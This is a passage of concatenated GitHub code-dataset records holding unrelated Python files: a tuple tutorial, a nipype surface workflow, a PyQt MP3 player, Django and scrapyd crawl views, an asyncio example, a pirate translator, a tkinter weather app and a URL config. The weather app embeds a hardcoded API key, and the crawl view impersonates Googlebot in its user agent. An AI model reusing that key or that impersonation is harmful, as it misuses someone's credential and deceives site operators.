immutable. In order to do it, we convert the tuple to a list\n# we perform wtv tf we wanna in the list and then convert the list back to the tuple\n# Flowchart: Tuple -> List -> Some functions on the list. Updated list -> Tuple\n# Example:\n\ncountries_i_wanna_visit = (\"Japan\", \"South Korea\", \"USA\", \"UK (again)\", \"Greece\", \"Phillippines\")\ntemp = list(countries_i_wanna_visit)\ntemp.append(\"Germany\")\ntemp.pop(countries_i_wanna_visit.index(\"Greece\")) # Removes Greece cuz it not that cool :/ Greece was boring..\ncountries_i_wanna_visit = tuple(temp)\nprint(countries_i_wanna_visit)\n\n\n# NOTE we can concatenate 2 tuples without converting them to lists.\ntuple1 = (1, 2)\ntuple2 = (3, 4)\ntuple3 = tuple1 + tuple2\nprint(tuple3)\n\n\n\n# NOTE some important tuple functions (they work without converting the tuple to lists)\n# count() - yk wat it does\n# index() - again yk wat it does\n# \n","repo_name":"rishav-the-kami/python-100-days-tutorial","sub_path":"Day24 (Tuple Operations)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"42209799451","text":"# -*- coding: utf-8 -*-\n# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nSurface extraction\n++++++++++++++++++\n\nDefines the workflows for extracting surfaces from segmentations\n\n\n\"\"\"\nimport nipype.pipeline.engine as pe # pipeline engine\nfrom nipype.interfaces import utility as niu # utility\nfrom nipype.interfaces import io as nio # i/o\nfrom nipype.interfaces import freesurfer as fs # Freesurfer\nfrom ..interfaces import (\n Binarize, NormalizeSurf, FillMask, AsegAddOuter, ApplyLTATransform\n)\n\n\ndef extract_surfs_fs_wf(name='extract_surfs_fs_wf'):\n \"\"\"\n This workflow extracts GIFTI sorfaces from a FreeSurfer subjects directory\n and projects them onto a target space.\n\n .. 
workflow::\n :graph2use: orig\n :simple_form: yes\n from regseg.workflows.surf import extract_surfs_fs_wf\n wf = extract_surfs_fs_wf()\n\n **Inputs**\n subjects_dir\n FreeSurfer SUBJECTS_DIR\n subject_id\n FreeSurfer subject ID\n t1_preproc\n The T1w preprocessed image (the co-registration target for\n bbr/bbregister)\n target_to_t1_lta\n A target-to-T1w affine transform, in LTA format.\n\n **Outputs**\n out_surf\n GIFTI surfaces, in target space\n \"\"\"\n workflow = pe.Workflow(name=name)\n\n inputnode = pe.Node(niu.IdentityInterface([\n 'subjects_dir', 'subject_id', 't1_preproc', 'xform_trg2t1']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(['out_surf']), name='outputnode')\n\n get_fs = pe.Node(nio.FreeSurferSource(), name='get_fs')\n exsurfs = extract_surfaces(normalize=False, use_ras_coord=False, brainmask=True)\n exsurfs.inputs.inputnode.model_name = 'boldsimple'\n\n tkreg = pe.Node(fs.Tkregister2(reg_file='native2fs.dat', noedit=True,\n reg_header=True), name='tkregister2')\n\n def _format_subid(sub_id):\n return '--subject %s' % sub_id\n lta_conv = pe.Node(fs.utils.LTAConvert(out_lta=True), 'lta_convert')\n lta_concat = pe.Node(fs.preprocess.ConcatenateLTA(out_type='RAS2RAS'), name='lta_concat')\n lta_xfm = pe.MapNode(ApplyLTATransform(), iterfield=['in_file'], name='lta_xfm')\n\n workflow.connect([\n (inputnode, get_fs, [('subjects_dir', 'subjects_dir'),\n ('subject_id', 'subject_id')]),\n (inputnode, tkreg, [('t1_preproc', 'moving_image'),\n ('subject_id', 'subject_id')]),\n (inputnode, lta_conv, [('t1_preproc', 'source_file'),\n (('subject_id', _format_subid), 'args')]),\n (inputnode, lta_concat, [('subjects_dir', 'subjects_dir'),\n ('subject_id', 'subject'),\n ('xform_trg2t1', 'in_lta1')]),\n (get_fs, exsurfs, [('aseg', 'inputnode.aseg'),\n ('norm', 'inputnode.norm'),\n ('brainmask', 'inputnode.brainmask')]),\n (get_fs, tkreg, [('orig', 'target_image')]),\n (tkreg, lta_conv, [('reg_file', 'in_reg')]),\n (get_fs, lta_conv, [('orig', 
'target_file')]),\n (lta_conv, lta_concat, [('out_lta', 'in_lta2')]),\n (lta_concat, lta_xfm, [('out_file', 'transform_file')]),\n (exsurfs, lta_xfm, [('outputnode.out_surf', 'in_file')]),\n (lta_xfm, outputnode, [('out_file', 'out_surf')]),\n ])\n\n return workflow\n\n\ndef mask2surf(name='MaskToSurface', use_ras_coord=True):\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['in_file', 'norm', 'in_filled', 'out_name']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(fields=['out_surf']), name='outputnode')\n binarize = pe.Node(fs.Binarize(min=0.1), name='binarize')\n fill = pe.Node(FillMask(), name='FillMask')\n pretess = pe.Node(fs.MRIPretess(label=1), name='PreTess')\n tess = pe.Node(fs.MRITessellate(label_value=1, use_real_RAS_coordinates=use_ras_coord),\n name='tess')\n smooth = pe.Node(fs.SmoothTessellation(disable_estimates=True),\n name='mris_smooth')\n rename = pe.Node(niu.Rename(keep_ext=False), name='rename')\n togii = pe.Node(fs.MRIsConvert(out_datatype='gii'), name='toGIFTI')\n\n wf = pe.Workflow(name=name)\n wf.connect([\n (inputnode, binarize, [('in_file', 'in_file')]),\n (inputnode, pretess, [('norm', 'in_norm')]),\n (inputnode, fill, [('in_filled', 'in_filled')]),\n (inputnode, rename, [('out_name', 'format_string')]),\n (binarize, fill, [('binary_file', 'in_file')]),\n (fill, pretess, [('out_file', 'in_filled')]),\n (pretess, tess, [('out_file', 'in_file')]),\n (tess, smooth, [('surface', 'in_file')]),\n (smooth, rename, [('surface', 'in_file')]),\n (rename, togii, [('out_file', 'in_file')]),\n (togii, outputnode, [('converted', 'out_surf')]),\n ])\n return wf\n\n\ndef extract_surfaces(name='GenSurface', normalize=True, use_ras_coord=True,\n brainmask=False):\n \"\"\"\n A nipype workflow for surface extraction from ``labels`` in a segmentation.\n\n .. 
note :: References used to implement this code:\n\n * \n * \n * \n * \n \"\"\"\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['aseg', 'norm', 'in_filled', 'brainmask', 't1_2_fsnative_invxfm', 'model_name'],\n mandatory_inputs=False),\n name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_surf', 'out_binary']), name='outputnode')\n\n surfnode = pe.Node(niu.IdentityInterface(fields=['out_surf']), name='surfnode')\n\n get_mod = pe.Node(niu.Function(function=_read_model, output_names=['name', 'labels']),\n name='GetModel')\n\n binarize = pe.MapNode(Binarize(), name='BinarizeLabels',\n iterfield=['match'])\n\n fill = pe.MapNode(FillMask(), name='FillMask', iterfield=['in_file'])\n pretess = pe.MapNode(fs.MRIPretess(label=1), name='PreTess',\n iterfield=['in_filled'])\n tess = pe.MapNode(fs.MRITessellate(label_value=1, use_real_RAS_coordinates=use_ras_coord),\n name='tess', iterfield=['in_file'])\n smooth = pe.MapNode(fs.SmoothTessellation(disable_estimates=True),\n name='mris_smooth', iterfield=['in_file'])\n rename = pe.MapNode(niu.Rename(keep_ext=False),\n name='rename', iterfield=['in_file', 'format_string'])\n\n togii = pe.MapNode(fs.MRIsConvert(out_datatype='gii'),\n iterfield='in_file', name='toGIFTI')\n\n wf = pe.Workflow(name=name)\n wf.connect([\n (inputnode, get_mod, [('model_name', 'model_name')]),\n (inputnode, binarize, [('aseg', 'in_file')]),\n (get_mod, binarize, [('labels', 'match')]),\n (inputnode, pretess, [('norm', 'in_norm')]),\n (inputnode, fill, [('in_filled', 'in_filled')]),\n (binarize, fill, [('out_file', 'in_file')]),\n (fill, pretess, [('out_file', 'in_filled')]),\n (pretess, tess, [('out_file', 'in_file')]),\n (tess, smooth, [('surface', 'in_file')]),\n (smooth, rename, [('surface', 'in_file')]),\n (get_mod, rename, [('name', 'format_string')]),\n (rename, togii, [('out_file', 'in_file')]),\n (fill, outputnode, [('out_file', 'out_binary')]),\n ])\n\n if brainmask:\n bmsk_wf = 
mask2surf(use_ras_coord=use_ras_coord)\n bmsk_wf.inputs.inputnode.out_name = 'brain.surf'\n merge = pe.Node(niu.Merge(2), name='mergebmask')\n wf.connect([\n (inputnode, bmsk_wf, [('brainmask', 'inputnode.in_file'),\n ('norm', 'inputnode.norm'),\n ('in_filled', 'inputnode.in_filled')]),\n (togii, merge, [('converted', 'in1')]),\n (bmsk_wf, merge, [('outputnode.out_surf', 'in2')]),\n (merge, surfnode, [('out', 'out_surf')]),\n ])\n else:\n wf.connect(togii, 'converted', surfnode, 'out_surf')\n\n if normalize:\n fixgii = pe.MapNode(NormalizeSurf(), iterfield='in_file', name='fixGIFTI')\n wf.connect([\n (inputnode, fixgii, [('t1_2_fsnative_invxfm', 'transform_file')]),\n (surfnode, fixgii, [('out_surf', 'in_file')]),\n (fixgii, outputnode, [('out_file', 'out_surf')]),\n ])\n else:\n wf.connect([\n (surfnode, outputnode, [('out_surf', 'out_surf')]),\n ])\n\n return wf\n\n\ndef extract_surfaces_model(model='bold', name='Surfaces', gen_outer=True):\n \"\"\"Extracts surfaces as prescribed by the model ``model``\"\"\"\n\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['aseg', 'norm', 'brainmask', 't1_2_fsnative_invxfm']), name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_surf']), name='outputnode')\n\n exsurfs = extract_surfaces()\n exsurfs.inputs.inputnode.model_name = model\n\n wf = pe.Workflow(name=name)\n wf.connect([\n (inputnode, exsurfs, [('norm', 'inputnode.norm'),\n ('t1_2_fsnative_invxfm', 'inputnode.t1_2_fsnative_invxfm')]),\n (exsurfs, outputnode, [('outputnode.out_surf', 'out_surf')]),\n ])\n\n if gen_outer:\n addmsk = pe.Node(AsegAddOuter(), name='addmsk')\n wf.connect([\n (inputnode, addmsk, [('aseg', 'in_file'),\n ('brainmask', 'in_mask')]),\n (addmsk, exsurfs, [('out_file', 'inputnode.aseg')]),\n ])\n else:\n wf.connect([\n (inputnode, exsurfs, [('aseg', 'inputnode.aseg')]),\n ])\n\n return wf\n\n\ndef _read_model(model_name):\n from sys import version_info\n import simplejson as json\n from pkg_resources import 
resource_filename as pkgrf\n\n with open(pkgrf('regseg', 'data/model_%s.json' % model_name.lower()),\n 'rb' if version_info[0] < 3 else 'r') as sfh:\n model = json.load(sfh)\n\n name = ['%s.surf' % m for m in model.keys()]\n labels = list(model.values())\n\n return name, labels\n","repo_name":"oesteban/regseg-2","sub_path":"regseg/workflows/surf.py","file_name":"surf.py","file_ext":"py","file_size_in_byte":10407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"31757772169","text":"import os\nfrom mp3 import Mp3Info\n\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PyQt5.QtCore import Qt, QUrl, QSize, QThread\nfrom PyQt5.QtGui import QIcon, QPalette\nfrom PyQt5.QtWidgets import QMessageBox, QMainWindow, QScrollArea, QAction, \\\n QLabel, QFileDialog, QVBoxLayout, QHBoxLayout, QWidget, QListWidget, \\\n QPushButton, QSlider, QAbstractItemView, QTableWidget, QTableWidgetItem\n\n\nclass MainWindow(QMainWindow):\n def __init__(self, file_name=None):\n super().__init__()\n self.setMinimumSize(850, 550)\n self.main_widget = MainWidget(self, file_name)\n self.setCentralWidget(self.main_widget)\n self.init_ui()\n\n def init_ui(self):\n opening = QAction('Open', self)\n opening.setShortcut('Ctrl+O')\n opening.triggered.connect(self.main_widget.request_mp3_file)\n\n menu_bar = self.menuBar()\n file_open = menu_bar.addMenu('&Open')\n file_open.addAction(opening)\n\n self.setWindowTitle('MP3')\n self.setWindowIcon(QIcon('logo.png'))\n self.show()\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Exit', \"Are you sure to exit?\",\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n\n event.accept() if reply == QMessageBox.Yes else event.ignore()\n\n\nclass MainWidget(QWidget):\n def __init__(self, main_window, file_name):\n super().__init__(main_window)\n self.main_window = main_window\n self.current_file = os.path.abspath(file_name) if \\\n file_name is not None else None\n 
self.track_name = TrackName(self)\n self.player_window = PlayerWindow(self)\n self.mp3_info_window = Mp3InfoWindow(self)\n self.current_file_screen = CurrentFileScreen(self)\n self.hex_table = HexTable(self)\n self.byte_info_screen = ByteInfoScreen(self)\n self.init_ui()\n\n def init_ui(self):\n main_vlayout = QVBoxLayout()\n main_hlayout = QHBoxLayout()\n\n v1_layout = QVBoxLayout()\n v1_layout.addWidget(self.track_name)\n v1_layout.addWidget(self.player_window)\n v1_layout.addWidget(self.mp3_info_window)\n\n v2_layout = QVBoxLayout()\n v2_layout.addWidget(self.byte_info_screen)\n v2_layout.addWidget(self.hex_table)\n\n main_hlayout.addLayout(v1_layout)\n main_hlayout.addLayout(v2_layout)\n\n main_vlayout.addLayout(main_hlayout)\n main_vlayout.addWidget(self.current_file_screen)\n self.setLayout(main_vlayout)\n\n def request_mp3_file(self):\n file_name, _ = QFileDialog.getOpenFileName(self, 'Open File',\n filter='MP3 Music (*.mp3)')\n self.open_mp3_file(file_name)\n\n def open_mp3_file(self, file_name):\n if file_name == '':\n return\n\n cur_dir = os.path.dirname(file_name)\n prev_dir = os.path.dirname(self.current_file) if \\\n self.current_file is not None else None\n\n self.current_file = file_name\n self.current_file_screen.update()\n self.player_window.stop()\n self.mp3_info_window.mp3_info_list.clear()\n if not cur_dir == prev_dir:\n self.player_window.set_list_of_all_mp3_files_in_current_dir()\n\n if self.hex_table.filler is not None and \\\n self.hex_table.filler.isRunning():\n self.hex_table.filler.terminate()\n\n try:\n self.track_name.update()\n self.mp3_info_window.update()\n self.hex_table.create_table()\n except AttributeError as e:\n self.mp3_info_window.mp3_info_list.addItem(e.args[0])\n\n def get_mp3_info(self):\n return self.mp3_info_window.mp3_info\n\n\nclass ByteInfoScreen(QLabel):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.setFixedHeight(40)\n\n def update(self, text):\n self.setText(text)\n\n\nclass 
TableFiller(QThread):\n def __init__(self, fill_table):\n super().__init__()\n self.fill_table = fill_table\n\n def run(self):\n self.fill_table()\n\n\nclass HexTable(QScrollArea):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.main_widget = main_widget\n self.mp3_info = None\n self.filler = None\n self.table = QTableWidget()\n self.setWidgetResizable(True)\n self.setWidget(self.table)\n\n def create_table(self):\n self.mp3_info = self.main_widget.get_mp3_info()\n self.filler = TableFiller(self.fill_table)\n self.filler.start()\n\n self.table.cellClicked.connect(self.write_byte_info)\n\n def fill_table(self):\n with open(self.mp3_info.filename, 'rb') as file:\n byte_count = len(file.read())\n file.seek(0)\n row_count = byte_count // 16 + 1\n\n self.table.setRowCount(row_count)\n self.table.setColumnCount(16)\n self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n for row in range(row_count):\n for column in range(16):\n item = QTableWidgetItem()\n text = file.read(1).hex()\n item.setTextAlignment(Qt.AlignCenter)\n item.setText(text)\n self.table.setItem(row, column, item)\n\n def write_byte_info(self, row, column):\n self.main_widget.byte_info_screen.update('{}, {}'.format(row, column))\n\n\nclass TrackName(QLabel):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.main_widget = main_widget\n self.setAlignment(Qt.AlignCenter)\n\n def update(self):\n filename = '' if self.main_widget.current_file is None else \\\n os.path.basename(self.main_widget.current_file)[:-4]\n self.setText(filename)\n\n\nclass PlayerWindow(QWidget):\n def __init__(self, main_widget):\n super().__init__(main_widget)\n self.main_widget = main_widget\n self.mp3_files = []\n self.played = False\n self.is_pause = False\n self.player = QMediaPlayer()\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignCenter)\n self.init_ui()\n\n def init_ui(self):\n previous_file = QPushButton(QIcon('pictures/prev.png'), '', self)\n 
previous_file.setFixedSize(56, 34)\n previous_file.setIconSize(QSize(40, 24))\n\n rewind = QPushButton(QIcon('pictures/rewind.png'), '', self)\n rewind.setFixedSize(56, 34)\n rewind.setIconSize(QSize(40, 24))\n\n play = QPushButton(QIcon('pictures/play.png'), '', self)\n play.setFixedSize(56, 34)\n play.setIconSize(QSize(40, 24))\n\n forward = QPushButton(QIcon('pictures/forward.png'), '', self)\n forward.setFixedSize(56, 34)\n forward.setIconSize(QSize(40, 24))\n\n next_file = QPushButton(QIcon('pictures/next.png'), '', self)\n next_file.setFixedSize(56, 34)\n next_file.setIconSize(QSize(40, 24))\n\n previous_file.clicked.connect(self.open_previous_file)\n play.clicked.connect(self.play_or_pause)\n next_file.clicked.connect(self.open_next_file)\n\n volume_slider = QSlider(Qt.Horizontal)\n volume_slider.setFixedWidth(100)\n volume_slider.setValue(50)\n volume_slider.valueChanged.connect(self.change_volume)\n\n self.layout.addWidget(previous_file)\n self.layout.addWidget(rewind)\n self.layout.addWidget(play)\n self.layout.addWidget(forward)\n self.layout.addWidget(next_file)\n self.layout.addWidget(volume_slider)\n\n self.setLayout(self.layout)\n\n def change_volume(self, volume):\n self.player.setVolume(volume)\n\n def play_or_pause(self):\n if self.is_pause:\n self.play()\n elif not self.played:\n self.start_play()\n else:\n self.pause()\n\n def play(self):\n self.player.play()\n self.played = True\n self.is_pause = False\n\n def pause(self):\n self.player.pause()\n self.is_pause = True\n\n def stop(self):\n self.player.stop()\n self.played = False\n self.is_pause = False\n\n def start_play(self):\n file = self.main_widget.current_file\n if file is not None:\n self.player.setMedia(QMediaContent(QUrl.fromLocalFile(file)))\n self.played = True\n self.play()\n\n def open_next_file(self):\n if self.played:\n self.stop()\n\n if self.main_widget.current_file is not None:\n cur_file_index = self.mp3_files.index(self.main_widget.current_file)\n\n if cur_file_index == 
len(self.mp3_files) - 1:\n cur_file_index = -1\n\n self.main_widget.open_mp3_file(self.mp3_files[cur_file_index + 1])\n\n def open_previous_file(self):\n if self.played:\n self.stop()\n\n if self.main_widget.current_file is not None:\n cur_file_index = self.mp3_files.index(self.main_widget.current_file)\n self.main_widget.open_mp3_file(self.mp3_files[cur_file_index - 1])\n\n def set_list_of_all_mp3_files_in_current_dir(self):\n current_file = self.main_widget.current_file\n current_dir = os.path.dirname(current_file)\n all_files = os.listdir(current_dir)\n self.mp3_files = [current_dir + '/' + file for file in all_files\n if file[-4:] == '.mp3']\n\n\nclass Mp3InfoWindow(QScrollArea):\n def __init__(self, main_window):\n super().__init__(main_window)\n self.main_window = main_window\n self.mp3_info = None\n self.mp3_info_list = QListWidget()\n self.setBackgroundRole(QPalette.Light)\n self.update()\n self.setWidgetResizable(True)\n self.setWidget(self.mp3_info_list)\n\n def update(self):\n if self.main_window.current_file is not None:\n self.mp3_info = Mp3Info(self.main_window.current_file)\n self.mp3_info_list.addItems(str(self.mp3_info).split('\\n'))\n\n\nclass CurrentFileScreen(QLabel):\n def __init__(self, main_window):\n super().__init__(main_window)\n self.main_window = main_window\n self.update()\n\n def update(self, *__args):\n text = 'File path: {}'.format(self.main_window.current_file)\n self.setToolTip(text)\n self.setText(text)\n","repo_name":"alexSatov/univer-python","sub_path":"MP3/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":10377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16646401352","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('book', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n 
name='books',\n options={'verbose_name_plural': '书籍', 'verbose_name': '书籍'},\n ),\n migrations.AlterField(\n model_name='books',\n name='type_id',\n field=models.SmallIntegerField(choices=[('JAVASCRIPT', 'javascript'), ('DATABASE', '数据库'), ('OPERATINGSYSTEM', '操作系统'), ('PYTHON', 'python'), ('ALGORITHMS', '数据结构与算法'), ('MACHINELEARNING', '机器学习')], default=1, verbose_name='商品种类'),\n ),\n ]\n","repo_name":"wuyumeng/bookstore","sub_path":"bookstore/book/migrations/0002_auto_20180402_2344.py","file_name":"0002_auto_20180402_2344.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"15723817259","text":"from uuid import uuid4\nfrom urllib.parse import urlparse\nfrom django.core.validators import URLValidator\nfrom django.core.exceptions import ValidationError\nfrom django.views.decorators.http import require_POST, require_http_methods\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom scrapyd_api import ScrapydAPI\nfrom main.utils import URLUtil\nfrom main.models import ScrapyItem\n\n# connect scrapyd service\nscrapyd = ScrapydAPI('http://localhost:6800')\n\n\ndef is_valid_url(url):\n validate = URLValidator()\n try:\n validate(url) # check if url format is valid\n except ValidationError:\n return False\n\n return True\n\n\n@csrf_exempt\n@require_http_methods(['POST', 'GET']) # only get and post\ndef crawl(request):\n # Post requests are for new crawling tasks\n if request.method == 'POST':\n\n url = request.POST.get('url', None) # take url comes from client. 
(From an input may be?)\n\n if not url:\n return JsonResponse({'error': 'Missing args'})\n\n if not is_valid_url(url):\n return JsonResponse({'error': 'URL is invalid'})\n\n domain = urlparse(url).netloc # parse the url and extract the domain\n unique_id = str(uuid4()) # create a unique ID.\n\n # This is the custom settings for scrapy spider.\n # We can send anything we want to use it inside spiders and pipelines.\n # I mean, anything\n settings = {\n 'unique_id': unique_id, # unique ID for each record for DB\n 'USER_AGENT': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'\n }\n\n # Here we schedule a new crawling task from scrapyd.\n # Notice that settings is a special argument name.\n # But we can pass other arguments, though.\n # This returns a ID which belongs and will be belong to this task\n # We are goint to use that to check task's status.\n task = scrapyd.schedule('default', 'icrawler',\n settings=settings, url=url, domain=domain)\n\n return JsonResponse({'task_id': task, 'unique_id': unique_id, 'status': 'started'})\n\n # Get requests are for getting result of a specific crawling task\n elif request.method == 'GET':\n # We were passed these from past request above. Remember ?\n # They were trying to survive in client side.\n # Now they are here again, thankfully. 
<3\n # We passed them back to here to check the status of crawling\n # And if crawling is completed, we respond back with a crawled data.\n task_id = request.GET.get('task_id', None)\n unique_id = request.GET.get('unique_id', None)\n\n if not task_id or not unique_id:\n return JsonResponse({'error': 'Missing args'})\n\n # Here we check status of crawling that just started a few seconds ago.\n # If it is finished, we can query from database and get results\n # If it is not finished we can return active status\n # Possible results are -> pending, running, finished\n status = scrapyd.job_status('default', task_id)\n if status == 'finished':\n try:\n # this is the unique_id that we created even before crawling started.\n item = ScrapyItem.objects.get(unique_id=unique_id)\n return JsonResponse({'data': item.to_dict['data']})\n except Exception as e:\n return JsonResponse({'error': str(e)})\n else:\n return JsonResponse({'status': status})","repo_name":"adriancast/Scrapyd-Django-Template","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"33"} +{"seq_id":"30410786859","text":"# Example 3-38. Option B: add the executor future to the gathered tasks\nimport time\nimport asyncio\n\n\n# This utility function make_coro() simply waits for the future to complete—\n# but crucially, it continues to wait for the future even inside the exception\n# handler for CancelledError.\nasync def make_coro(future):\n try:\n return await future\n except asyncio.CancelledError:\n return await future\n\n\nasync def main():\n loop = asyncio.get_running_loop()\n future = loop.run_in_executor(None, blocking)\n # We take the future returned from the run_in_executor() call and pass it\n # into a new utility function, make_coro(). 
The important point here is\n # that we’re using create_task(), which means that this task will appear\n # in the list of all_tasks() within the shutdown handling of\n # asyncio.run(), and will receive a cancellation during the shutdown\n # process.\n asyncio.create_task(make_coro(future))\n print(f'{time.ctime()} Hello!')\n await asyncio.sleep(1.0)\n print(f'{time.ctime()} Goodbye!')\n\n\ndef blocking():\n time.sleep(2.0)\n print(f\"{time.ctime()} Hello from a thread!\")\n\n\ntry:\n asyncio.run(main())\nexcept KeyboardInterrupt:\n print('Bye!')\n","repo_name":"ckarageorgkaneen/usingaio","sub_path":"chapter3/38/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"33"} +{"seq_id":"1440369181","text":"#! /usr/bin/env python3\nimport random\n\n\ndef main():\n\n # define lists for dictionary construction\n english_words = [\n \"sir\", \"hotel\", \"student\", \"boy\", \"madam\", \"professor\", \"restaurant\", \"your\", \"excuse\",\n \"students\", \"are\", \"lawyer\", \"the\", \"restroom\", \"my\", \"hello\", \"is\", \"man\"\n ]\n \n pirate_words = [\n \"matey\", \"fleabag inn\", \"swabbie\", \"matey\", \"proud beauty\", \"foul blaggart\", \"galley\", \"yer\", \"arr\",\n \"swabbies\", \"be\", \"foul blaggart\", \"th'\", \"head\", \"me\", \"avast\", \"be\", \"matey\"\n ]\n \n # intro + showing of translatable words\n print(\"This is a translator for pirate language.\")\n print(\"Current supported words are:\")\n sample = random.sample(english_words, 6)\n for i in sample: print(i)\n\n # get word to translate and construct dictionary.\n str_to_translate = input(\"Please enter a phrase to translate.\\n\").split(\" \")\n translate_dict = {english:pirate for (english, pirate) in zip(english_words, pirate_words)}\n\n # process translation\n output_dir = []\n for i in str_to_translate:\n if translate_dict.get(i) is not None:\n 
output_dir.append(translate_dict[i])\n else:\n output_dir.append(i)\n \n # output\n print(output_dir)\n print(f\"Translated string is: {' '.join(output_dir)}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"KCNOSU29K3/CSE-INTERMEDIATE","sub_path":"mod-3/Lesson_2/pirate.py","file_name":"pirate.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"36544441470","text":"import tkinter as tk\r\nfrom tkinter import font\r\nimport requests\r\n\r\ndegree_sign = u\"\\N{DEGREE SIGN}\"\r\n\r\ndef format_response(weather):\r\n try:\r\n name, code = weather[\"name\"], weather[\"sys\"][\"country\"]\r\n desc = weather[\"weather\"][0][\"description\"]\r\n temp = weather[\"main\"][\"temp\"]\r\n\r\n final_str = f\"City: {name}, {code}\\nConditions: {desc}\\nTemperature ({degree_sign}C): {temp} \"\r\n except:\r\n final_str = \"There was a problem\\nretrieving that information\"\r\n\r\n return final_str\r\ndef get_weather(city):\r\n weather_key = \"536e97816398ceb705c3fef5a5e262fd\"\r\n url = \"http://api.openweathermap.org/data/2.5/weather\"\r\n params = {\"APPID\": weather_key, \"q\": city, \"units\": \"metric\"}\r\n response = requests.get(url, params=params)\r\n weather = response.json()\r\n\r\n results[\"text\"] = format_response((weather))\r\n\r\n\r\nHEIGHT = 500\r\nWIDTH = 600\r\n\r\n# every tkinter has a root window\r\nroot = tk.Tk()\r\n\r\ncanvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)\r\ncanvas.pack()\r\n\r\nbackground_image = tk.PhotoImage(file=\"landscape.png\")\r\nbackground_label = tk.Label(root, image=background_image)\r\nbackground_label.place(relwidth=1, relheight=1)\r\n\r\n# upper frame smaller one on top\r\nframe = tk.Frame(root, bg=\"#80c1ff\", bd=5)\r\nframe.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.1, anchor=\"n\")\r\n\r\nentry = tk.Entry(frame, font=(\"Courier\", 18))\r\nentry.place(relwidth=0.65, relheight=1)\r\n\r\nbutton = 
tk.Button(frame, text=\"Get Weather\", font=(\"Courier\", 12), command=lambda: get_weather(entry.get()))\r\nbutton.place(relx=0.7, relheight=1, relwidth=0.3)\r\n\r\n# lower frame\r\n\r\nlower_frame = tk.Frame(root, bg=\"#80c1ff\", bd=5)\r\nlower_frame.place(relx=0.5, rely=0.25, relwidth=0.75, relheight=0.6, anchor=\"n\")\r\n\r\nresults = tk.Label(lower_frame, font=(\"Courier\", 14), anchor=\"nw\", justify=\"left\", bd=4)\r\nresults.place(relwidth=1, relheight=1)\r\n\r\n# every application goes in between the root.mainloop() and root = tl.Tk()\r\nroot.mainloop()\r\n","repo_name":"balrajjutte/WeatherApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10371674901","text":"\"\"\"feedit URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom feeds import views\n\n#from . 
import views\nurlpatterns = [\n path(\"\",views.ApiRoot.as_view()),\n path('admin/', admin.site.urls),\n path('users/',views.UserList.as_view(),name=views.UserList.name),\n path('users//',views.UserDetail.as_view(),name=views.UserDetail.name),\n path('profiles/',views.ListProfileModel.as_view(),name=views.ListProfileModel.name),\n path('profiles//',views.ListProfileModelDetail.as_view(),name=views.ListProfileModelDetail.name),\n\n path('comments/',views.ListPostCommentModel.as_view(),name=views.ListPostCommentModel.name),\n path('comments/',views.ListPostCommentModelDetail.as_view(),name=views.ListPostCommentModelDetail.name),\n\n path('profiles-post/',views.ListProfilePostsModel.as_view(),name=views.ListProfilePostsModel.name),\n path('profiles-post//',views.ListProfilePostsModelDetail.as_view(),name=views.ListProfilePostsModelDetail.name),\n path('api-token-auth2/',views.CustomAuthToken.as_view()),\n path('api-auth/', 